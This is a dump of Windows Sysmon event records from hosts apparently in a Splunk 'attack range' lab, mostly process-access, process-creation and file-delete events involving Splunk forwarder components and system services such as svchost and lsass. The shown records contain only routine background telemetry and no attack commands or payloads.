14:20:19.277{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205690Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.277{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205689Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.277{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-18A3-629A-5D42-000000005F02}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205688Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.277{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A3-629A-5D42-000000005F02}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205687Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.278{2E1864BB-18A3-629A-5D42-000000005F02}4580C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205686Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:19.131{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A1C907690DDE0DD7D817947B1166EAF,SHA256=7B5199F8A400F48199026269C6730BE599C1570CFB63A94ECF08E6966C76FD9E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205749Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.565{2E1864BB-18A4-629A-5F42-000000005F02}59047284C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205748Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.312{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A4-629A-5F42-000000005F02}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205747Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-18A4-629A-5F42-000000005F02}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205746Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205745Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205744Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205743Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205742Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-18A4-629A-5F42-000000005F02}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205741Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.299{2E1864BB-18A4-629A-5F42-000000005F02}5904C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205740Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04303BFD92E96B94411C77DE0D7B76DD,SHA256=E6135192E06F1AED02DBD4E78CA3A6F401F2A078B6142382A57D69D2A31DD356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205739Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.296{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=33D16D348DC82EEEAD35FB9843240A38,SHA256=CAFBCCCC5BDE2260E1FC8B63A907597D7D13B8BF6E85C544DE2CC306164A0B9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044615Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:20.530{0A5DF930-E3BE-6299-9D00-000000006002}2084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=0740A2DEACCE77172C7542C8E73DDD1B,SHA256=377C8BDFB4E7222A4C09C862EC7C921BEDD5033A61EB95D78EEECF539B61165E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044614Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:20.061{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97EFEBE0D9FA059F2A21830986FBE30F,SHA256=154D0A8745BA6E29727368E2389BB3B5E46A04F115DC55C2BB2101707B6528C2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205738Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:20.110{2E1864BB-18A3-629A-5E42-000000005F02}5792508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000205737Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:17.855{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56402-false10.0.1.12-8000- 23542300x8000000000000000205750Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:21.412{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDCE189FF93CDE68C88C0EEC767FE4B4,SHA256=41C738200B39B506B48BCAD19FB50CF5A5512B838B59F1C9965F2B1ED579837F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044616Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:21.155{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=272E7C0A69CC85B24ED8899D8071CF6B,SHA256=C021BB72B671FB6C00C8B7B79974CCC35E02033E2580774945A61EE328DABBD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205751Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:22.531{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C81C85F1700ABB74A186D08922136A4,SHA256=B3AB2DD5A0847E85DC443185FD65A1D3195A6F487289D336E1DF742628ECB11D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044617Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:22.248{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E22C16F2D18721E2408325F893D214E9,SHA256=E8EF059DE8DD314B99E482F3E58231BDCCBD5E9351E2DB78E81980F1B786E18A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000044619Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:20:23.342{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D4FA3D7FC7E681964D5B5B5A3CD33F3,SHA256=B656E00C5C475F3A5C97268440175E2A95B8217A3BBC58BBA321219CF3970842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000205763Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.551{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61E3D5094E5A25882AAD14C7B2F3F69F,SHA256=28633CFE7512CB60BA290FA47A8833CD2B03CD0566E6152FF0BE7851422574D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205762Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.404{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E13A-6299-0100-000000005F02}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+976d2|C:\Windows\system32\kerberos.DLL+79b14|C:\Windows\system32\kerberos.DLL+1444f|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+2d0a6|C:\Windows\system32\lsasrv.dll+328e9|C:\Windows\system32\lsasrv.dll+30237|C:\Windows\system32\lsasrv.dll+2f1c1|C:\Windows\system32\lsasrv.dll+174fd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e 10341000x8000000000000000205761Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.282{2E1864BB-E13C-6299-0B00-000000005F02}6364748C:\Windows\system32\lsass.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205760Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.266{2E1864BB-E13C-6299-0B00-000000005F02}6364072C:\Windows\system32\lsass.exe{2E1864BB-E13E-6299-1000-000000005F02}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea6c|C:\Windows\system32\lsasrv.dll+e6b04|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205759Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.197{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-18A7-629A-6042-000000005F02}968C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205758Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205757Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:20:23.182{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 